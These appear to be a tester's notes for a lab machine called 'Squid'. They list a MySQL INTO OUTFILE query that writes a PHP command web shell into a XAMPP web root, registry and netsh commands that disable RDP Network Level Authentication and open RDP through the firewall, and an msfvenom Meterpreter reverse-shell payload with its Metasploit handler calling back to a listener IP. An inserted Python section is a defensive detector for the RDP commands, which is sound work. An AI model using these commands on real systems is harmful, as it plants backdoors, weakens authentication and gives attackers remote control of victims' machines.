Squid Machine
PG/easy_windows
This machine runs a proxy named Squid that proxies all network traffic from outside. It operates on port 3128.
MySQL 3306:
SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\backdoor.php"
Disable NLA (Network Level Authentication):
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-TCP" /v UserAuthentication /t REG_DWORD /d "0" /f
Enable RDP on owned machine:
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall set rule group="remote desktop" new enable=yes
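Added example (not part of the original notes): the three commands above leave distinctive process command lines, so a defender can flag them in process-creation logs and alert when one host shows all three. The (host, command line) event format, the host names and the rule names are assumptions; the sample events are constructed.

```python
import re

# One rule per command from the notes; cmd.exe is case-insensitive, so is the match.
RULES = {
    "nla_disabled": re.compile(
        r'\breg(?:\.exe)?\s+add\b.*\\WinStations\\RDP-TCP\b.*'
        r'/v\s+UserAuthentication\b.*/d\s+"?0"?(?:\s|$)', re.I),
    "rdp_enabled": re.compile(
        r'\breg(?:\.exe)?\s+add\b.*\\Control\\Terminal Server"?\s.*'
        r'/v\s+fDenyTSConnections\b.*/d\s+"?0"?(?:\s|$)', re.I),
    "rdp_firewall_opened": re.compile(
        r'\bnetsh(?:\.exe)?\s+advfirewall\s+firewall\s+set\s+rule\s+'
        r'group="remote desktop".*\benable=yes\b', re.I),
}

# Constructed process-creation events: (host, command line).
TS_KEY = r'HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server'
SAMPLE = [
    ("WS01", rf'reg add "{TS_KEY}" /v fDenyTSConnections /t REG_DWORD /d 0 /f'),
    ("WS01", 'netsh advfirewall firewall set rule group="remote desktop" new enable=yes'),
    ("WS01", rf'reg add "{TS_KEY}\WinStations\RDP-TCP" /v UserAuthentication /t REG_DWORD /d "0" /f'),
    # Benign: a read-only query, and a change that turns NLA back on (/d 1).
    ("WS02", rf'reg query "{TS_KEY}" /v fDenyTSConnections'),
    ("WS02", rf'reg.exe add "{TS_KEY}\WinStations\RDP-TCP" /v UserAuthentication /t REG_DWORD /d 1 /f'),
]

def scan(events):
    """Return (host, finding) for every command line that matches a rule."""
    return [(host, name)
            for host, cmdline in events
            for name, rx in RULES.items()
            if rx.search(cmdline)]

def rdp_exposure_chain(hits):
    """Hosts where RDP was enabled, the firewall opened and NLA disabled."""
    seen = {}
    for host, name in hits:
        seen.setdefault(host, set()).add(name)
    return sorted(h for h, names in seen.items() if names == set(RULES))

if __name__ == "__main__":
    hits = scan(SAMPLE)
    for host, name in hits:
        print(f"{host}: {name}")
    print("full RDP exposure chain on:", rdp_exposure_chain(hits))
```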
Reverse Shell with Meterpreter:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.17 LPORT=4444 --format=exe > evil.exe
msf5> use exploit/multi/handler
msf5> set payload windows/meterpreter/reverse_tcp
msf5> set LHOST 192.168.0.17
msf5> set LPORT 4444
msf5> run